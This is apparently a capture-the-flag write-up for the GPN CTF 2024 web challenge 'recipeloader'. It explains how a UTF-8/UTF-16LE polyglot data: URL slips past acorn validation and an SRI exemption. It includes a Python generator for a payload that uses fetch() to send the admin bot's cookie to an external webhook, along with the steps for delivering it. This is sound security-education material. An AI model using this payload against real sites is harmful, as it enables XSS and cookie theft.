recipeloader
gpn24
Task: a client page validates a fetched JS 'recipe = \"...\"' with acorn then loads the same URL as a <script>, exempting data: URLs from SRI. Solution: build a UTF-8/UTF-16LE polyglot data: URL — UTF-8 view passes acorn's string-literal check, UTF-16LE view (honored by <script charset>) runs fetch() to exfiltrate the admin bot's flag cookie.
$ ls tags/ techniques/
recipeloader — GPN CTF 2024 (gpn24)
Description
You can load a javascript recipe pls no(w) xss
English summary: A client page (http://localhost:1337/) takes a ?url= parameter,
fetch()es it, validates the text as a strict recipe = "..." assignment using the
acorn parser, then injects the same URL as a <script src=url>. Non-static URL
schemes (http/https) are bound by Subresource Integrity (SRI), but "static" schemes
(data:, blob:, ...) are exempted. An admin bot stores the flag in a normal,
non-HttpOnly, same-origin cookie named flag on localhost:1337 and then visits an
attacker-supplied URL. Goal: get XSS to exfiltrate that cookie.
Analysis
The vulnerable load pattern (index.html)
async function runScript(url) { const txt = await fetch(url).then(r => r.text()); if (!isRecipeAssignmentProgram(txt)) throw new Error("invalid recipe assignment program"); const s = document.createElement("script"); s.src = url; if (!isScriptStatic(url)) s.integrity = `sha256-${await sha256(txt)}`; document.head.appendChild(s); }
This is a classic check-then-load (TOCTOU) pattern: the validated bytes
(txt from fetch) and the executed bytes (whatever <script src=url> resolves
to) are two independent loads. The only thing keeping them identical is the SRI
integrity attribute.
isRecipeAssignmentProgram(src)runs acorn withsourceType:"script"and demands EXACTLY:body.length === 1, a singleExpressionStatementthat is anAssignmentExpressionwith operator"=", left =Identifiernamedrecipe, right = a stringLiteralor expression-freeTemplateLiteral. In other words the text must be exactlyrecipe = "...".isScriptStatic(url)parses the URL and looks at the protocol:staticProtos = [data, blob, javascript, mailto, resource, ssh, tel]→ no integrity.nonstaticProtos = [file, ftp, http, https, urn, view-source, ws, wss]→ integrity applied.- Unknown protocol → throws.
sha256()usesUint8Array.prototype.toBase64()to build the SRI digest.- After load,
show()doesrecipeTarget.textContent = recipe—textContent, so no direct HTML injection is possible; we genuinely need script execution.
The bot (admin.js)
GET /bot/runrequirestypeof url === 'string' && url.startsWith('http://localhost:1337').- Headless chromium (playwright) goes to
http://localhost:1337, runsdocument.cookie = "flag" + process.env.FLAG(cookie name isflag, value is the flag), then navigates to the attacker URL, waits 10s, logsdocument.cookie, closes.
So the flag is a normal same-origin cookie. Any JS executing on localhost:1337
can read it and exfiltrate it.
The key weakness — SRI exemption + decoding differential
For http:///https:// the SRI binding makes the validated text and the executed
script byte-identical, so they cannot diverge. But data: is in staticProtos,
so no integrity is enforced. We just need ONE byte sequence that:
- when decoded by
fetch().text()→ passes the strictrecipe = "..."acorn check, and - when executed by
<script src=...>→ is arbitrary JavaScript.
The differential that makes this possible:
fetch('data:...').text()decodes the body as UTF-8 and IGNORES the;charset=parameter. Verified empirically:fetch('data:text/plain;charset=UTF-16LE,AB')returns the 2 ASCII charsA,B— not one UTF-16 code unit.<script src="data:...;charset=UTF-16LE,...">HONORS the charset and decodes the same bytes as UTF-16LE before executing. Verified: a UTF-16LE-encodedwindow.__ran='YES'ran when loaded as a charset=UTF-16LE script.
Same bytes, two decodings → a UTF-8/UTF-16LE polyglot.
Solution
Polyglot construction
We force a UTF-8 prefix recipe =" (note the space before =) and fill the
string body with ASCII characters interleaved with 0x00 NUL bytes. Acorn happily
accepts raw NULs inside a string literal, so the UTF-8 view is a valid
recipe = "<ascii+NULs>" assignment. In UTF-16LE each <asciichar>\x00 pair decodes
to a clean ASCII char, so the UTF-16LE view reads as ordinary ASCII JavaScript.
Engineering constraints (all required):
- Space before
=. In UTF-16LE the bytesr e c i p e SP = "decode to a run of CJK code points (敲 楣 数 㴠 ...) that are all valid identifier characters, forming one valid JS identifier. Without the space, the 4th UTF-16 unit becomesU+223D(∽, a math symbol) which is not an identifier char and breaks the UTF-16 program. - Avoid
"(0x22) and\(0x5c) inside the UTF-8 string body — those bytes would prematurely close/escape the UTF-8 string literal. Use single quotes in the payload. - Parity / alignment.
recipe ="is 9 bytes (odd). One filler byte0x3d(=) is prepended to the payload so the first UTF-16 unit after the prefix (0x22paired with0x3d→U+3D22, a valid identifier-continue char) keeps the leading identifier syntactically valid; the rest then sits on even byte boundaries for clean ascii+NUL interleaving. A trailing space byte is added before the closing"if needed to keep total length even (it falls inside the UTF-16//comment).
Final UTF-16LE program that actually runs:
敲楣数㴠㴢=fetch('//<EXFIL_HOST>?'+document.cookie)//∠
In sloppy/script mode this assigns the fetch(...) result to an implicit global
(allowed), and the trailing // comments out the leftover units (the closing-quote
byte etc). The fetch leaks document.cookie to the attacker host.
Both views were validated programmatically: the UTF-8 view passes the exact acorn
recipe = "..." predicate; the UTF-16LE view parses as a syntactically valid
sloppy-mode script.
Reusable solver — gen_payload.py
#!/usr/bin/env python3 import sys, urllib.parse EXFIL = sys.argv[1] if len(sys.argv) > 1 else "EXFILHOST/exfil" TARGET = "http://localhost:1337/" def utf16_ascii(s): out = bytearray() for ch in s: c = ord(ch); assert c < 128, ch out += bytes([c, 0]) return bytes(out) pre = b'recipe ="' # space before = is required for UTF-16 alignment payload = "=fetch('//" + EXFIL + "?'+document.cookie)//" # no " or \ allowed content = bytes([0x3d]) + utf16_ascii(payload) body = pre + content full = body + b'"' if len(full) % 2 != 0: full = body + b' "' enc = ''.join('%%%02X' % b for b in full) data_url = 'data:text/javascript;charset=UTF-16LE,' + enc attack_url = TARGET + '?url=' + urllib.parse.quote(data_url, safe='') bot_url = 'http://localhost:1337/bot/run?url=' + urllib.parse.quote(attack_url, safe='') print("UTF-8 view:", full.decode('utf-8')) print("UTF-16 view:", full.decode('utf-16le')) print("DATA URL:\n" + data_url) print("ATTACK URL:\n" + attack_url) print("BOT URL:\n" + bot_url)
Delivery / exploitation steps
- Generate the
data:URL with a readable exfil host (used webhook.site; created a token viaPOST https://webhook.site/token). - Build the attack URL:
http://localhost:1337/?url=<urlencoded data: URL>. It starts withhttp://localhost:1337, so it passes the bot'sstartsWithcheck. - Submit to the bot:
GET https://<instance>/bot/run?url=<urlencoded attack URL>→ bot repliesok. - The bot sets cookie
flag+FLAG onlocalhost:1337, then visits the attack URL. The pagefetch()es thedata:URL (UTF-8 → valid recipe, passes validation, no SRI becausedata:is "static"), then loads the samedata:URL as a<script charset=UTF-16LE>which executes the UTF-16 payload and fetches//webhook/?<document.cookie>. - Poll the webhook; received
...?flagGPNCTF{url_p4RSIN6_15_HArd_EVEN_FOr_BrOw5ers}(cookie nameflag+ flag value).
The flag text itself confirms the bug class: "url parsing is hard even for browsers."
$ cat /etc/motd
Liked this one?
Pro unlocks every writeup, every flag, and API access. $9/mo.
$ cat pricing.md$ grep --similar
Similar writeups
- [web][free]Trust Issues— tjctf
- [web][free]cookoff— gpnctf
- [web][Pro]board_of_secrets— miptctf
- [web][free]SecretPickle— gpnctf
- [web][free]Tiny Web smol— gpnctf